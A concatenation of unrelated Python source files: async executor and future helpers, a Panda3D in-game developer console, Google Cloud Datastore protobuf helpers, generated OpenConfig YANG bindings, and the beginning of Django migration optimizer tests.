dummy_executor = DummyExecutor()
def run_on_executor(*args, **kwargs):
"""Decorator to run a synchronous method asynchronously on an executor.
The decorated method may be called with a ``callback`` keyword
argument and returns a future.
The `.IOLoop` and executor to be used are determined by the ``io_loop``
and ``executor`` attributes of ``self``. To use different attributes,
pass keyword arguments to the decorator::
@run_on_executor(executor='_thread_pool')
def foo(self):
pass
.. versionchanged:: 4.2
Added keyword arguments to use alternative attributes.
"""
def run_on_executor_decorator(fn):
executor = kwargs.get("executor", "executor")
io_loop = kwargs.get("io_loop", "io_loop")
@functools.wraps(fn)
def wrapper(self, *args, **kwargs):
callback = kwargs.pop("callback", None)
future = getattr(self, executor).submit(fn, self, *args, **kwargs)
if callback:
getattr(self, io_loop).add_future(
future, lambda future: callback(future.result()))
return future
return wrapper
if args and kwargs:
raise ValueError("cannot combine positional and keyword args")
if len(args) == 1:
return run_on_executor_decorator(args[0])
elif len(args) != 0:
raise ValueError("expected 1 argument, got %d", len(args))
return run_on_executor_decorator
_NO_RESULT = object()
def return_future(f):
"""Decorator to make a function that returns via callback return a
`Future`.
The wrapped function should take a ``callback`` keyword argument
and invoke it with one argument when it has finished. To signal failure,
the function can simply raise an exception (which will be
captured by the `.StackContext` and passed along to the ``Future``).
From the caller's perspective, the callback argument is optional.
If one is given, it will be invoked when the function is complete
with `Future.result()` as an argument. If the function fails, the
callback will not be run and an exception will be raised into the
surrounding `.StackContext`.
If no callback is given, the caller should use the ``Future`` to
wait for the function to complete (perhaps by yielding it in a
`.gen.engine` function, or passing it to `.IOLoop.add_future`).
Usage:
.. testcode::
@return_future
def future_func(arg1, arg2, callback):
# Do stuff (possibly asynchronous)
callback(result)
@gen.engine
def caller(callback):
yield future_func(arg1, arg2)
callback()
..
Note that ``@return_future`` and ``@gen.engine`` can be applied to the
same function, provided ``@return_future`` appears first. However,
consider using ``@gen.coroutine`` instead of this combination.
"""
replacer = ArgReplacer(f, 'callback')
@functools.wraps(f)
def wrapper(*args, **kwargs):
future = TracebackFuture()
callback, args, kwargs = replacer.replace(
lambda value=_NO_RESULT: future.set_result(value),
args, kwargs)
def handle_error(typ, value, tb):
future.set_exc_info((typ, value, tb))
return True
exc_info = None
with ExceptionStackContext(handle_error):
try:
result = f(*args, **kwargs)
if result is not None:
raise ReturnValueIgnoredError(
"@return_future should not be used with functions "
"that return values")
except:
exc_info = sys.exc_info()
raise
if exc_info is not None:
# If the initial synchronous part of f() raised an exception,
# go ahead and raise it to the caller directly without waiting
# for them to inspect the Future.
future.result()
# If the caller passed in a callback, schedule it to be called
# when the future resolves. It is important that this happens
# just before we return the future, or else we risk confusing
# stack contexts with multiple exceptions (one here with the
# immediate exception, and again when the future resolves and
# the callback triggers its exception by calling future.result()).
if callback is not None:
def run_callback(future):
result = future.result()
if result is _NO_RESULT:
callback()
else:
callback(future.result())
future.add_done_callback(wrap(run_callback))
return future
return wrapper
def chain_future(a, b):
"""Chain two futures together so that when one completes, so does the other.
The result (success or failure) of ``a`` will be copied to ``b``, unless
``b`` has already been completed or cancelled by the time ``a`` finishes.
"""
def copy(future):
assert future is a
if b.done():
return
if (isinstance(a, TracebackFuture) and isinstance(b, TracebackFuture)
and a.exc_info() is not None):
b.set_exc_info(a.exc_info())
elif a.exception() is not None:
b.set_exception(a.exception())
else:
b.set_result(a.result())
a.add_done_callback(copy)
| |
# -*- coding: utf-8 -*-
# Copyright Reinier de Blois
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from panda3d.core import TextNode, TextProperties, TextPropertiesManager
from direct.showbase.DirectObject import DirectObject
from direct.gui.DirectGui import DirectFrame, DirectEntry
from direct.gui.OnscreenText import OnscreenText
from panda3d.core import *
import sys
import traceback
import __main__
from code import InteractiveInterpreter
import panda3d
TEXT_MARGIN = (0.03, -0.06)
class PseudoFile:
def __init__(self, write):
self.write = write
def readline(self):
pass
def writelines(self, l):
map(self.append, l)
def flush(self):
pass
def isatty(self):
return 1
class DeveloperConsole(InteractiveInterpreter, DirectObject):
"""The name says it all."""
def __init__(self, xml):
sys.stdout = PseudoFile(self.writeOut)
sys.stderr = PseudoFile(self.writeErr)
tpErr = TextProperties()
tpErr.setTextColor(1, 0.5, 0.5, 1)
TextPropertiesManager.getGlobalPtr().setProperties("err", tpErr)
font = loader.loadFont("cmss12")
self.frame = DirectFrame(parent=base.a2dTopCenter, text_align=TextNode.ALeft, text_pos=(-base.getAspectRatio() + TEXT_MARGIN[0], TEXT_MARGIN[1]), text_scale=0.05, text_fg=(1, 1, 1, 1), frameSize=(-2.0, 2.0, -0.5, 0.0), frameColor=(0, 0, 0, 0.5), text='', text_font=font)
self.entry = DirectEntry(parent=base.a2dTopLeft, command=self.command, scale=0.05, width=1000.0, pos=(-0.02, 0, -0.48), relief=None, text_pos=(1.5, 0, 0), text_fg=(1, 1, 0.5, 1), rolloverSound=None, clickSound=None, text_font=font)
self.otext = OnscreenText(parent=self.entry, scale=1, align=TextNode.ALeft, pos=(1, 0, 0), fg=(1, 1, 0.5, 1), text=':', font=font)
self.lines = [''] * 9
self.commands = [] # All previously sent commands
self.cscroll = None # Index of currently navigated command, None if current
self.command = '' # Currently entered command
self.block = '' # Temporarily stores a block of commands
self.hide()
self.initialized = False
self.toggleKeys = manager.controls.registerKeyAll("Toggle Console", "`", self.toggle, self)
def reload(self, xml):
pass
def prevCommand(self):
if self.hidden:
return
if len(self.commands) == 0:
return
if self.cscroll == None:
self.cscroll = len(self.commands)
self.command = self.entry.get()
elif self.cscroll <= 0:
return
else:
self.commands[self.cscroll] = self.entry.get()
self.cscroll -= 1
self.entry.set(self.commands[self.cscroll])
self.entry.setCursorPosition(len(self.commands[self.cscroll]))
def nextCommand(self):
if self.hidden:
return
if len(self.commands) == 0:
return
if self.cscroll == None:
return
self.commands[self.cscroll] = self.entry.get()
self.cscroll += 1
if self.cscroll >= len(self.commands):
self.cscroll = None
self.entry.set(self.command)
self.entry.setCursorPosition(len(self.command))
else:
self.entry.set(self.commands[self.cscroll])
self.entry.setCursorPosition(len(self.commands[self.cscroll]))
def writeOut(self, line, copy=True):
if copy:
sys.__stdout__.write(line)
lines = line.split('\n')
firstline = lines.pop(0)
self.lines[-1] += firstline
self.lines += lines
self.frame['text'] = '\n'.join(self.lines[-9:])
def writeErr(self, line, copy=True):
if copy:
sys.__stderr__.write(line)
line = '\1err\1%s\2' % line
lines = line.split('\n')
firstline = lines.pop(0)
self.lines[-1] += firstline
self.lines += lines
self.frame['text'] = '\n'.join(self.lines[-9:])
def command(self, text):
if not self.hidden:
self.cscroll = None
self.command = ''
self.entry.set('')
self.entry['focus'] = True
self.writeOut(self.otext['text'] + ' ' + text + '\n', False)
if text != '' and (len(self.commands) == 0 or self.commands[-1] != text):
self.commands.append(text)
# Insert plugins into the local namespace
locals = __main__.__dict__
for plugin in manager.getNamed().keys():
locals[plugin] = manager.getNamed()[plugin]
locals['panda3d'] = panda3d
#register custom commands
locals['reload'] = manager.reload
locals['load'] = manager.transition
locals['wireframe'] = base.toggleWireframe
locals['trigger'] = events.triggerEvent
# Run it and print the output.
if not self.initialized:
InteractiveInterpreter.__init__(self, locals=locals)
self.initialized = True
try:
if self.runsource(self.block + '\n' + text) and text != '':
self.otext['text'] = '.'
self.block += '\n' + text
else:
self.otext['text'] = ':'
self.block = ''
except Exception: # Not just "except", it will also catch SystemExit
# Whoops! Print out a traceback.
self.writeErr(traceback.format_exc())
def toggle(self):
#remove toggle key from entry
if self.entry['focus']:
for gtype in self.toggleKeys.keys():
key = self.toggleKeys[gtype]
entryLen = len(self.entry.get(True))
if self.entry.get(True)[entryLen - len(key):entryLen] == key:
self.entry.enterText(self.entry.get(True)[:entryLen - len(key)])
if self.hidden:
self.show()
else:
self.hide()
def start(self):
return
#self.toggle()
def stop(self):
return
#self.toggle()
def show(self):
self.accept('arrow_up', self.prevCommand)
self.accept('arrow_up-repeat', self.prevCommand)
self.accept('arrow_down', self.nextCommand)
self.accept('arrow_down-repeat', self.nextCommand)
self.hidden = False
self.entry['focus'] = True
self.frame.show()
self.entry.show()
self.otext.show()
def hide(self):
self.ignoreAll()
self.hidden = True
self.entry['focus'] = False
self.frame.hide()
self.entry.hide()
self.otext.hide()
def destroy(self):
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
self.ignoreAll()
self.frame.destroy()
self.entry.destroy()
self.otext.destroy()
| |
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for dealing with Cloud Datastore's Protobuf API.
The non-private functions are part of the API.
"""
import datetime
import itertools
from google.protobuf import struct_pb2
from google.type import latlng_pb2
import six
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud._helpers import _pb_timestamp_to_datetime
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.entity import Entity
from google.cloud.datastore.key import Key
def _get_meaning(value_pb, is_list=False):
"""Get the meaning from a protobuf value.
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The protobuf value to be checked for an
associated meaning.
:type is_list: bool
:param is_list: Boolean indicating if the ``value_pb`` contains
a list value.
:rtype: int
:returns: The meaning for the ``value_pb`` if one is set, else
:data:`None`. For a list value, if there are disagreeing
means it just returns a list of meanings. If all the
list meanings agree, it just condenses them.
"""
meaning = None
if is_list:
# An empty list will have no values, hence no shared meaning
# set among them.
if len(value_pb.array_value.values) == 0:
return None
# We check among all the meanings, some of which may be None,
# the rest which may be enum/int values.
all_meanings = [_get_meaning(sub_value_pb)
for sub_value_pb in value_pb.array_value.values]
unique_meanings = set(all_meanings)
if len(unique_meanings) == 1:
# If there is a unique meaning, we preserve it.
meaning = unique_meanings.pop()
else: # We know len(value_pb.array_value.values) > 0.
# If the meaning is not unique, just return all of them.
meaning = all_meanings
elif value_pb.meaning: # Simple field (int32).
meaning = value_pb.meaning
return meaning
def _new_value_pb(entity_pb, name):
"""Add (by name) a new ``Value`` protobuf to an entity protobuf.
:type entity_pb: :class:`.entity_pb2.Entity`
:param entity_pb: An entity protobuf to add a new property to.
:type name: str
:param name: The name of the new property.
:rtype: :class:`.entity_pb2.Value`
:returns: The new ``Value`` protobuf that was added to the entity.
"""
return entity_pb.properties.get_or_create(name)
def _property_tuples(entity_pb):
"""Iterator of name, ``Value`` tuples from entity properties.
:type entity_pb: :class:`.entity_pb2.Entity`
:param entity_pb: An entity protobuf to add a new property to.
:rtype: :class:`generator`
:returns: An iterator that yields tuples of a name and ``Value``
corresponding to properties on the entity.
"""
return six.iteritems(entity_pb.properties)
def entity_from_protobuf(pb):
"""Factory method for creating an entity based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Entity`
:param pb: The Protobuf representing the entity.
:rtype: :class:`google.cloud.datastore.entity.Entity`
:returns: The entity derived from the protobuf.
"""
key = None
if pb.HasField('key'): # Message field (Key)
key = key_from_protobuf(pb.key)
entity_props = {}
entity_meanings = {}
exclude_from_indexes = []
for prop_name, value_pb in _property_tuples(pb):
value = _get_value_from_value_pb(value_pb)
entity_props[prop_name] = value
# Check if the property has an associated meaning.
is_list = isinstance(value, list)
meaning = _get_meaning(value_pb, is_list=is_list)
if meaning is not None:
entity_meanings[prop_name] = (meaning, value)
# Check if ``value_pb`` was excluded from index. Lists need to be
# special-cased and we require all ``exclude_from_indexes`` values
# in a list agree.
if is_list and len(value) > 0:
exclude_values = set(value_pb.exclude_from_indexes
for value_pb in value_pb.array_value.values)
if len(exclude_values) != 1:
raise ValueError('For an array_value, subvalues must either '
'all be indexed or all excluded from '
'indexes.')
if exclude_values.pop():
exclude_from_indexes.append(prop_name)
else:
if value_pb.exclude_from_indexes:
exclude_from_indexes.append(prop_name)
entity = Entity(key=key, exclude_from_indexes=exclude_from_indexes)
entity.update(entity_props)
entity._meanings.update(entity_meanings)
return entity
def _set_pb_meaning_from_entity(entity, name, value, value_pb,
is_list=False):
"""Add meaning information (from an entity) to a protobuf.
:type entity: :class:`google.cloud.datastore.entity.Entity`
:param entity: The entity to be turned into a protobuf.
:type name: str
:param name: The name of the property.
:type value: object
:param value: The current value stored as property ``name``.
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The protobuf value to add meaning / meanings to.
:type is_list: bool
:param is_list: (Optional) Boolean indicating if the ``value`` is
a list value.
"""
if name not in entity._meanings:
return
meaning, orig_value = entity._meanings[name]
# Only add the meaning back to the protobuf if the value is
# unchanged from when it was originally read from the API.
if orig_value is not value:
return
# For lists, we set meaning on each sub-element.
if is_list:
if not isinstance(meaning, list):
meaning = itertools.repeat(meaning)
val_iter = six.moves.zip(value_pb.array_value.values,
meaning)
for sub_value_pb, sub_meaning in val_iter:
if sub_meaning is not None:
sub_value_pb.meaning = sub_meaning
else:
value_pb.meaning = meaning
def entity_to_protobuf(entity):
"""Converts an entity into a protobuf.
:type entity: :class:`google.cloud.datastore.entity.Entity`
:param entity: The entity to be turned into a protobuf.
:rtype: :class:`.entity_pb2.Entity`
:returns: The protobuf representing the entity.
"""
entity_pb = entity_pb2.Entity()
if entity.key is not None:
key_pb = entity.key.to_protobuf()
entity_pb.key.CopyFrom(key_pb)
for name, value in entity.items():
value_is_list = isinstance(value, list)
value_pb = _new_value_pb(entity_pb, name)
# Set the appropriate value.
_set_protobuf_value(value_pb, value)
# Add index information to protobuf.
if name in entity.exclude_from_indexes:
if not value_is_list:
value_pb.exclude_from_indexes = True
for sub_value in value_pb.array_value.values:
sub_value.exclude_from_indexes = True
# Add meaning information to protobuf.
_set_pb_meaning_from_entity(entity, name, value, value_pb,
is_list=value_is_list)
return entity_pb
def get_read_options(eventual, transaction_id):
"""Validate rules for read options, and assign to the request.
Helper method for ``lookup()`` and ``run_query``.
:type eventual: bool
:param eventual: Flag indicating if ``EVENTUAL`` or ``STRONG``
consistency should be used.
:type transaction_id: bytes
:param transaction_id: A transaction identifier (may be null).
:rtype: :class:`.datastore_pb2.ReadOptions`
:returns: The read options corresponding to the inputs.
:raises: :class:`ValueError` if ``eventual`` is ``True`` and the
``transaction_id`` is not ``None``.
"""
if transaction_id is None:
if eventual:
return datastore_pb2.ReadOptions(
read_consistency=datastore_pb2.ReadOptions.EVENTUAL)
else:
return datastore_pb2.ReadOptions()
else:
if eventual:
raise ValueError('eventual must be False when in a transaction')
else:
return datastore_pb2.ReadOptions(
transaction=transaction_id)
def key_from_protobuf(pb):
"""Factory method for creating a key based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Key`
:param pb: The Protobuf representing the key.
:rtype: :class:`google.cloud.datastore.key.Key`
:returns: a new `Key` instance
"""
path_args = []
for element in pb.path:
path_args.append(element.kind)
if element.id: # Simple field (int64)
path_args.append(element.id)
# This is safe: we expect proto objects returned will only have
# one of `name` or `id` set.
if element.name: # Simple field (string)
path_args.append(element.name)
project = None
if pb.partition_id.project_id: # Simple field (string)
project = pb.partition_id.project_id
namespace = None
if pb.partition_id.namespace_id: # Simple field (string)
namespace = pb.partition_id.namespace_id
return Key(*path_args, namespace=namespace, project=project)
def _pb_attr_value(val):
"""Given a value, return the protobuf attribute name and proper value.
The Protobuf API uses different attribute names based on value types
rather than inferring the type. This function simply determines the
proper attribute name based on the type of the value provided and
returns the attribute name as well as a properly formatted value.
Certain value types need to be coerced into a different type (such
as a `datetime.datetime` into an integer timestamp, or a
`google.cloud.datastore.key.Key` into a Protobuf representation. This
function handles that for you.
.. note::
Values which are "text" ('unicode' in Python2, 'str' in Python3) map
to 'string_value' in the datastore; values which are "bytes"
('str' in Python2, 'bytes' in Python3) map to 'blob_value'.
For example:
>>> _pb_attr_value(1234)
('integer_value', 1234)
>>> _pb_attr_value('my_string')
('string_value', 'my_string')
:type val:
:class:`datetime.datetime`, :class:`google.cloud.datastore.key.Key`,
bool, float, integer, bytes, str, unicode,
:class:`google.cloud.datastore.entity.Entity`, dict, list,
:class:`google.cloud.datastore.helpers.GeoPoint`, NoneType
:param val: The value to be scrutinized.
:rtype: tuple
:returns: A tuple of the attribute name and proper value type.
"""
if isinstance(val, datetime.datetime):
name = 'timestamp'
value = _datetime_to_pb_timestamp(val)
elif isinstance(val, Key):
name, value = 'key', val.to_protobuf()
elif isinstance(val, bool):
name, value = 'boolean', val
elif isinstance(val, float):
name, value = 'double', val
elif isinstance(val, six.integer_types):
name, value = 'integer', val
elif isinstance(val, six.text_type):
name, value = 'string', val
elif isinstance(val, six.binary_type):
name, value = 'blob', val
elif isinstance(val, Entity):
name, value = 'entity', val
elif isinstance(val, dict):
entity_val = Entity(key=None)
entity_val.update(val)
name, value = 'entity', entity_val
elif isinstance(val, list):
name, value = 'array', val
elif isinstance(val, GeoPoint):
name, value = 'geo_point', val.to_protobuf()
elif val is None:
name, value = 'null', struct_pb2.NULL_VALUE
else:
raise ValueError('Unknown protobuf attr type', type(val))
return name + '_value', value
def _get_value_from_value_pb(value_pb):
"""Given a protobuf for a Value, get the correct value.
The Cloud Datastore Protobuf API returns a Property Protobuf which
has one value set and the rest blank. This function retrieves the
the one value provided.
Some work is done to coerce the return value into a more useful type
(particularly in the case of a timestamp value, or a key value).
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The Value Protobuf.
:rtype: object
:returns: The value provided by the Protobuf.
:raises: :class:`ValueError <exceptions.ValueError>` if no value type
has been set.
"""
value_type = value_pb.WhichOneof('value_type')
if value_type == 'timestamp_value':
result = _pb_timestamp_to_datetime(value_pb.timestamp_value)
elif value_type == 'key_value':
result = key_from_protobuf(value_pb.key_value)
elif value_type == 'boolean_value':
result = value_pb.boolean_value
elif value_type == 'double_value':
result = value_pb.double_value
elif value_type == 'integer_value':
result = value_pb.integer_value
elif value_type == 'string_value':
result = value_pb.string_value
elif value_type == 'blob_value':
result = value_pb.blob_value
elif value_type == 'entity_value':
result = entity_from_protobuf(value_pb.entity_value)
elif value_type == 'array_value':
result = [_get_value_from_value_pb(value)
for value in value_pb.array_value.values]
elif value_type == 'geo_point_value':
result = GeoPoint(value_pb.geo_point_value.latitude,
value_pb.geo_point_value.longitude)
elif value_type == 'null_value':
result = None
else:
raise ValueError('Value protobuf did not have any value set')
return result
def _set_protobuf_value(value_pb, val):
"""Assign 'val' to the correct subfield of 'value_pb'.
The Protobuf API uses different attribute names based on value types
rather than inferring the type.
Some value types (entities, keys, lists) cannot be directly
assigned; this function handles them correctly.
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The value protobuf to which the value is being assigned.
:type val: :class:`datetime.datetime`, boolean, float, integer, string,
:class:`google.cloud.datastore.key.Key`,
:class:`google.cloud.datastore.entity.Entity`
:param val: The value to be assigned.
"""
attr, val = _pb_attr_value(val)
if attr == 'key_value':
value_pb.key_value.CopyFrom(val)
elif attr == 'timestamp_value':
value_pb.timestamp_value.CopyFrom(val)
elif attr == 'entity_value':
entity_pb = entity_to_protobuf(val)
value_pb.entity_value.CopyFrom(entity_pb)
elif attr == 'array_value':
if len(val) == 0:
array_value = entity_pb2.ArrayValue(values=[])
value_pb.array_value.CopyFrom(array_value)
else:
l_pb = value_pb.array_value.values
for item in val:
i_pb = l_pb.add()
_set_protobuf_value(i_pb, item)
elif attr == 'geo_point_value':
value_pb.geo_point_value.CopyFrom(val)
else: # scalar, just assign
setattr(value_pb, attr, val)
class GeoPoint(object):
"""Simple container for a geo point value.
:type latitude: float
:param latitude: Latitude of a point.
:type longitude: float
:param longitude: Longitude of a point.
"""
def __init__(self, latitude, longitude):
self.latitude = latitude
self.longitude = longitude
def to_protobuf(self):
"""Convert the current object to protobuf.
:rtype: :class:`google.type.latlng_pb2.LatLng`.
:returns: The current point as a protobuf.
"""
return latlng_pb2.LatLng(latitude=self.latitude,
longitude=self.longitude)
def __eq__(self, other):
"""Compare two geo points for equality.
:rtype: bool
:returns: True if the points compare equal, else False.
"""
if not isinstance(other, GeoPoint):
return NotImplemented
return (self.latitude == other.latitude and
self.longitude == other.longitude)
def __ne__(self, other):
"""Compare two geo points for inequality.
:rtype: bool
:returns: False if the points compare equal, else True.
"""
return not self == other
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class tag64(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-ipv6-reachability/prefixes/prefix/subTLVs/subTLVs/tag64. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines sub-TLV 2.
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "tag64"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-ipv6-reachability",
"prefixes",
"prefix",
"subTLVs",
"subTLVs",
"tag64",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
YANG Description: State parameters of sub-TLV 2.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters of sub-TLV 2.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
from . import state
class tag64(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-ipv6-reachability/prefixes/prefix/subTLVs/subTLVs/tag64. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines sub-TLV 2.
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "tag64"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-ipv6-reachability",
"prefixes",
"prefix",
"subTLVs",
"subTLVs",
"tag64",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
YANG Description: State parameters of sub-TLV 2.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters of sub-TLV 2.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
| |
from django.db import migrations, models
from django.db.migrations import operations
from django.db.migrations.optimizer import MigrationOptimizer
from django.test import SimpleTestCase
from .models import EmptyManager, UnicodeModel
class OptimizerTests(SimpleTestCase):
"""
Tests the migration autodetector.
"""
def optimize(self, operations, app_label):
"""
Handy shortcut for getting results + number of loops
"""
optimizer = MigrationOptimizer()
return optimizer.optimize(operations, app_label), optimizer._iterations
def assertOptimizesTo(self, operations, expected, exact=None, less_than=None, app_label=None):
result, iterations = self.optimize(operations, app_label)
result = [repr(f.deconstruct()) for f in result]
expected = [repr(f.deconstruct()) for f in expected]
self.assertEqual(expected, result)
if exact is not None and iterations != exact:
raise self.failureException(
"Optimization did not take exactly %s iterations (it took %s)" % (exact, iterations)
)
if less_than is not None and iterations >= less_than:
raise self.failureException(
"Optimization did not take less than %s iterations (it took %s)" % (less_than, iterations)
)
def assertDoesNotOptimize(self, operations, **kwargs):
self.assertOptimizesTo(operations, operations, **kwargs)
def test_single(self):
"""
The optimizer does nothing on a single operation,
and that it does it in just one pass.
"""
self.assertOptimizesTo(
[migrations.DeleteModel("Foo")],
[migrations.DeleteModel("Foo")],
exact=1,
)
def test_create_delete_model(self):
"""
CreateModel and DeleteModel should collapse into nothing.
"""
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.DeleteModel("Foo"),
],
[],
)
def test_create_rename_model(self):
"""
